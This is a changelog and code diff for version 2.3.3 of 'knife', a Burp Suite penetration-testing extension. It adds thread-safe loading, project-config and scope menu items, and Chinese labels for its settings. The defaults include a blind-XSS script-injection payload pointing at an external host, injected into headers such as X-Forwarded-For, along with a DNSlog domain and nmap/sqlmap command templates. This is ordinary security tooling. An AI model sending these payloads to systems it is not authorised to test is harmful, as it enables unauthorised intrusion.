v2.3.3

1、配置插件优化UI线程安全加载

2、移植knife-plus部分功能
在Auto_Load_Project_Config为True的情况下:
支持每次插件启动时进行加载项目配置文件
支持右键菜单手动保存项目配置文件
支持右键菜单手动加载项目配置文件
支持右键增加scope include域名 (正则)
支持右键增加scope exclude域名 (正则)
支持右键清空scope 所有范围
支持通过配置Add_Hosts_Exclude_Scope添加默认需要排除scope exclude域名 (域名正则格式)

3、用中文描述了部分内置属性

src/burp/BurpExtender.java

@@ -7,8 +7,7 @@
 import java.util.Iterator;
 import java.util.List;
 
-import javax.swing.JMenu;
-import javax.swing.JMenuItem;
+import javax.swing.*;
 
 import com.bit4woo.utilbox.burp.HelperPlus;
 import com.google.gson.Gson;
@@ -22,6 +21,7 @@
 import messageTab.U2C.ChineseTabFactory;
 import config.ProcessManager;
 import org.apache.commons.lang3.StringUtils;
+import plus.*;
 
 public class BurpExtender extends GUI implements IBurpExtender, IContextMenuFactory, ITab, IHttpListener, IProxyListener, IExtensionStateListener {
 
@@ -57,27 +57,40 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
         BurpExtender.stdout.println(getFullExtensionName());
         BurpExtender.stdout.println(github);
 
-        configTable = new ConfigTable(new ConfigTableModel());
-        configPanel.setViewportView(configTable);
+        // [重要] 使用 SwingUtilities.invokeLater 解决操作过快 导致出现swing崩溃的问题
+        SwingUtilities.invokeLater(new Runnable() {
+            public void run() {
+                configTable = new ConfigTable(new ConfigTableModel());
+                configPanel.setViewportView(configTable);
 
-        String content = callbacks.loadExtensionSetting("knifeconfig");
-        if (StringUtils.isEmpty(content)) {
-            content = initConfig();
-        }
+                String content = callbacks.loadExtensionSetting("knifeconfig");
+                if (StringUtils.isEmpty(content)) {
+                    content = initConfig();
+                }
+
+                configManager = new Gson().fromJson(content, ConfigManager.class);
+                showToUI(configManager);
+
+                ChineseTabFactory chntabFactory = new ChineseTabFactory(null, false, helpers, callbacks);
 
-        configManager = new Gson().fromJson(content, ConfigManager.class);
-        showToUI(configManager);
+                //各项数据初始化完成后在进行这些注册操作，避免插件加载时的空指针异常
+                callbacks.setExtensionName(getFullExtensionName());
+                callbacks.registerContextMenuFactory(BurpExtender.this);// for menus
+                callbacks.registerMessageEditorTabFactory(chntabFactory);// for Chinese
+                callbacks.addSuiteTab(BurpExtender.this);
+                callbacks.registerHttpListener(BurpExtender.this);
+                callbacks.registerProxyListener(BurpExtender.this);
+                callbacks.registerExtensionStateListener(BurpExtender.this);
 
-        ChineseTabFactory chntabFactory = new ChineseTabFactory(null, false, helpers, callbacks);
+                //自动加载用户指定的 Project Json文件,如果不存在会自动保存当前配置
+                AdvScopeUtils.autoLoadProjectConfig(callbacks);
+                //追加用户设置的默认需要排除的数据
+                AdvScopeUtils.addDefaultExcludeHosts(callbacks);
 
-        //各项数据初始化完成后在进行这些注册操作，避免插件加载时的空指针异常
-        callbacks.setExtensionName(getFullExtensionName());
-        callbacks.registerContextMenuFactory(this);// for menus
-        callbacks.registerMessageEditorTabFactory(chntabFactory);// for Chinese
-        callbacks.addSuiteTab(BurpExtender.this);
-        callbacks.registerHttpListener(this);
-        callbacks.registerProxyListener(this);
-        callbacks.registerExtensionStateListener(this);
+                BurpExtender.stdout.println("Load Extension Success ...");
+            }
+        }
+        );
     }
 
 
@@ -130,6 +143,15 @@ public List<JMenuItem> createMenuItems(IContextMenuInvocation invocation) {
             menu_item_list.add(updateHeader);
         }
 
+        //winzer0 添加 配置文件相关 //手动更新用户指定的 Project Json 文件
+        menu_item_list.add(new ProjectConfigLoadMenu(this));
+        menu_item_list.add(new ProjectConfigSaveMenu(this));
+        menu_item_list.add(new ProjectScopeClearMenu(this));
+        menu_item_list.add(new AddHostToInScopeMenu(this));
+        menu_item_list.add(new AddHostToInScopeAdvMenu(this));
+        menu_item_list.add(new AddHostToExScopeMenu(this));
+        menu_item_list.add(new AddHostToExScopeAdvMenu(this));
+
         //扫描攻击相关
         menu_item_list.add(new AddHostToScopeMenu(this));
         menu_item_list.add(new RunCmdMenu(this));

src/config/ConfigEntry.java

@@ -72,8 +72,8 @@ public class ConfigEntry {
 
     public static final String Run_External_Cmd = "Run_External_Cmd";
 
-    public static final String Scope_Comment_Global = " This config affects ALL requests; ";
-    public static final String Scope_Comment_checkbox = " The scope of this config is controlled by the checkbox above; ";
+    public static final String Scope_Comment_Global = "此配置影响所有请求; ";
+    public static final String Scope_Comment_checkbox = "此配置影响范围由上面的复选框控制; ";
 
     public ConfigEntry() {
         //to resolve "default constructor not found" error

src/config/ConfigTableModel.java

@@ -36,42 +36,51 @@ public class ConfigTableModel extends AbstractTableModel{
 	public static final String Nmap_Command = "nmap -Pn -sT -sV --min-rtt-timeout 1ms "
 			+ "--max-rtt-timeout 1000ms --max-retries 0 --max-scan-delay 0 --min-rate 3000 {Host}";
 
-	private static final String Robot_Input_Comment = "this config effects how sqlmap and nmap runs";
-
 	public ConfigTableModel(){
 
-		configEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false));
-		configEntries.add(new ConfigEntry("DNSlogServer", "bit.0y0.link",ConfigEntry.Config_Basic_Variable,true,false));
+		configEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false,"合并knife右键子菜单"));
+
+		//用于指示是否自动加载burp suite的项目配置文件,需要指示Json文件路径,需要支持相对路径,直接在knife下去寻找
+		configEntries.add(new ConfigEntry("Auto_Load_Project_Config", "Project.Config.json",ConfigEntry.Config_Basic_Variable,true,false,"高级配置：启动时自动加载项目配置"));
+		configEntries.add(new ConfigEntry("Scope_Base_On_SubDomain", "",ConfigEntry.Config_Basic_Variable,true,false,"高级配置：设置Scope时基于子域名操作"));
+		configEntries.add(new ConfigEntry("Auto_Save_Scope_Update", "",ConfigEntry.Config_Basic_Variable,true,false,"高级配置：自动保存Scope更新到项目配置"));
+		//默认不添加到scope的域名 //需要优化,不能每次都添加
+		String defaultExcludeHosts = ".*\\.baidu\\.com,.*\\.bdstatic\\.com,.*\\.msn\\.cn,.*\\.microsoft\\.com,.*\\.bing\\.com,.*\\.google\\.com,.*\\.firefox\\.com";
+		configEntries.add(new ConfigEntry("Add_Exclude_Scope_Hosts",defaultExcludeHosts,ConfigEntry.Config_Basic_Variable,false,false,"高级配置：将目标正则追加到排除Scope"));
+
 		if (SystemUtils.isMac()) {
-			configEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false));
+			configEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false,"程序调用：指定浏览器路径"));
 		}else {
-			configEntries.add(new ConfigEntry("browserPath", Firefox_Windows,ConfigEntry.Config_Basic_Variable,true,false));
+			configEntries.add(new ConfigEntry("browserPath", Firefox_Windows,ConfigEntry.Config_Basic_Variable,true,false,"程序调用：指定浏览器路径"));
 		}
-		configEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false));
+		configEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false,"基本属性：常见认证头"));
 		//configEntries.add(new ConfigEntry("DismissedTargets", "{\"*.firefox.com\":\"Drop\",\"*.mozilla.com\":\"Drop\"}",ConfigEntry.Config_Basic_Variable,true,false));
 		//configEntries.add(new ConfigEntry("DismissedAutoForward", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
 		//configEntries.add(new ConfigEntry("DismissedHost", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
 		//configEntries.add(new ConfigEntry("DismissedURL", "",ConfigEntry.Config_Basic_Variable,true,false));
 		//configEntries.add(new ConfigEntry("DismissAction", "enable = ACTION_DROP; disable = ACTION_DONT_INTERCEPT",ConfigEntry.Config_Basic_Variable,true,false,"enable this config to use ACTION_DROP,disable to use ACTION_DONT_INTERCEPT"));
-		configEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,true,false));
+		configEntries.add(new ConfigEntry("DNSlogServer", "bit.0y0.link",ConfigEntry.Config_Basic_Variable,false,false,"自动替换：DNSLog域名"));
+		configEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,false,false,"自动替换：XSS Payload"));
 
-		configEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true));
-		configEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false));
-		configEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,Robot_Input_Comment));
+		configEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true,"命令输入：SQL调用命令"));
+		configEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false,"命令输入：Nmap调用命令"));
+
+		configEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,"命令输入：机器输入 影响sqlmap和nmap"));
 		//Mac中，通过脚本执行的也会有命令历史记录，使用这种方式最好
 
-		configEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
-		configEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
-		configEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false));
+		configEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false,"分块配置：分块长度"));
+		configEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false,"分块配置：功能开关"));
+		configEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false,"分块配置：使用注释"));
 
 		//configEntries.add(new ConfigEntry("Proxy-ServerList", "127.0.0.1:8888;127.0.0.1:9999;",ConfigEntry.Config_Proxy_Variable,false,false));
 		//configEntries.add(new ConfigEntry("Proxy-UseRandomMode", "",ConfigEntry.Config_Proxy_Variable,true,false));
 		//以上都是固定基础变量，不需要修改名称和类型
 
-		configEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-		configEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-		configEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-		configEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true));
+		configEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true,"修改请求：自动移除Last-Modified头"));
+		configEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true,"修改请求：自动移除If-Modified-Since头"));
+		configEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true,"修改请求：自动移除If-None-Match头"));
+
+		configEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true, "修改请求：自动忽略OPTIONS方法请求"));
 
 		configEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true));
 		//避免IP:port的切分操作，把Payload破坏，所以使用不带分号的简洁Payload

src/plus/AddHostToExScopeAdvMenu.java

@@ -0,0 +1,62 @@
+package plus;
+
+import burp.*;
+import config.GUI;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.io.PrintWriter;
+import java.util.HashSet;
+
+public class AddHostToExScopeAdvMenu extends JMenuItem {//JMenuItem vs. JMenu
+
+    public AddHostToExScopeAdvMenu(BurpExtender burp){
+        this.setText("^_^ Add Host To ExScope Adv");
+        this.addActionListener(new AddHostToExScopeAdv_Action(burp,burp.invocation));
+    }
+}
+
+
+
+class AddHostToExScopeAdv_Action implements ActionListener{
+    //scope matching is actually String matching!!
+    private IContextMenuInvocation invocation;
+    public BurpExtender myburp;
+    public IExtensionHelpers helpers;
+    public PrintWriter stdout;
+    public PrintWriter stderr;
+    public IBurpExtenderCallbacks callbacks;
+    //callbacks.printOutput(Integer.toString(invocation.getToolFlag()));//issue tab of target map is 16
+    public AddHostToExScopeAdv_Action(BurpExtender burp, IContextMenuInvocation invocation) {
+        this.invocation  = invocation;
+        this.helpers = burp.helpers;
+        this.callbacks = burp.callbacks;
+        this.stderr = burp.stderr;
+    }
+
+
+    @Override
+    public void actionPerformed(ActionEvent e)
+    {
+        try{
+            String wildcardSet  = GUI.getConfigTableModel().getConfigValueByKey("Scope_Base_On_SubDomain");
+            HashSet<String> hostHashSet = new HashSet<>();
+            IHttpRequestResponse[] messages = invocation.getSelectedMessages();
+            for(IHttpRequestResponse message:messages) {
+                String host = message.getHttpService().getHost();
+                if(wildcardSet!=null){
+                    host = UtilsPlus.hostToWildcardHostWithDotEscape(host);
+                }else {
+                    host = UtilsPlus.dotToEscapeDot(host);
+                }
+                hostHashSet.add(host);
+            }
+            AdvScopeUtils.addHostToExScopeAdv(callbacks, hostHashSet);
+        }
+        catch (Exception e1)
+        {
+            e1.printStackTrace(stderr);
+        }
+    }
+}

src/plus/AddHostToExScopeMenu.java

@@ -0,0 +1,52 @@
+package plus;
+
+import burp.*;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.io.PrintWriter;
+
+public class AddHostToExScopeMenu extends JMenuItem {//JMenuItem vs. JMenu
+
+    public AddHostToExScopeMenu(BurpExtender burp){
+        this.setText("^_^ Add Host To ExScope");
+        this.addActionListener(new AddHostToExScope_Action(burp,burp.invocation));
+    }
+}
+
+
+
+class AddHostToExScope_Action implements ActionListener{
+	//scope matching is actually String matching!!
+	private IContextMenuInvocation invocation;
+    public BurpExtender myburp;
+	public IExtensionHelpers helpers;
+	public PrintWriter stdout;
+	public PrintWriter stderr;
+	public IBurpExtenderCallbacks callbacks;
+	//callbacks.printOutput(Integer.toString(invocation.getToolFlag()));//issue tab of target map is 16
+	public AddHostToExScope_Action(BurpExtender burp, IContextMenuInvocation invocation) {
+		this.invocation  = invocation;
+        this.helpers = burp.helpers;
+        this.callbacks = burp.callbacks;
+		this.stderr = burp.stderr;
+		this.stdout = burp.stdout;
+	}
+
+
+	@Override
+	public void actionPerformed(ActionEvent e)
+	{
+		IHttpRequestResponse[] messages = invocation.getSelectedMessages();
+
+		if (AdvScopeUtils.isAdvScopeMode(callbacks)){
+			//高级模式
+			AdvScopeUtils.addHostToExScopeAdv(callbacks, UtilsPlus.getHostSetFromMessages(messages));
+		} else {
+			//普通模式
+			UtilsPlus.addHostToExScope(callbacks, UtilsPlus.getUrlSetFromMessages(messages));
+		}
+	}
+
+}

src/plus/AddHostToInScopeAdvMenu.java

@@ -0,0 +1,62 @@
+package plus;
+
+import burp.*;
+import config.GUI;
+
+import javax.swing.*;
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.io.PrintWriter;
+import java.util.HashSet;
+
+public class AddHostToInScopeAdvMenu extends JMenuItem {//JMenuItem vs. JMenu
+
+    public AddHostToInScopeAdvMenu(BurpExtender burp){
+        this.setText("^_^ Add Host To InScope Adv");
+        this.addActionListener(new AddHostToInScopeAdv_Action(burp,burp.invocation));
+    }
+}
+
+
+
+class AddHostToInScopeAdv_Action implements ActionListener{
+    //scope matching is actually String matching!!
+    private IContextMenuInvocation invocation;
+    public BurpExtender myburp;
+    public IExtensionHelpers helpers;
+    public PrintWriter stdout;
+    public PrintWriter stderr;
+    public IBurpExtenderCallbacks callbacks;
+    //callbacks.printOutput(Integer.toString(invocation.getToolFlag()));//issue tab of target map is 16
+    public AddHostToInScopeAdv_Action(BurpExtender burp, IContextMenuInvocation invocation) {
+        this.invocation  = invocation;
+        this.helpers = burp.helpers;
+        this.callbacks = burp.callbacks;
+        this.stderr = burp.stderr;
+    }
+
+
+    @Override
+    public void actionPerformed(ActionEvent e)
+    {
+        try{
+            String wildcardSet  = GUI.getConfigTableModel().getConfigValueByKey("Scope_Base_On_SubDomain");
+            HashSet<String> hostHashSet = new HashSet<>();
+            IHttpRequestResponse[] messages = invocation.getSelectedMessages();
+            for(IHttpRequestResponse message:messages) {
+                String host = message.getHttpService().getHost();
+                if(wildcardSet!=null){
+                    host = UtilsPlus.hostToWildcardHostWithDotEscape(host);
+                }else {
+                    host = UtilsPlus.dotToEscapeDot(host);
+                }
+                hostHashSet.add(host);
+            }
+            AdvScopeUtils.addHostToInScopeAdv(callbacks,hostHashSet);
+        }
+        catch (Exception e1)
+        {
+            e1.printStackTrace(stderr);
+        }
+    }
+}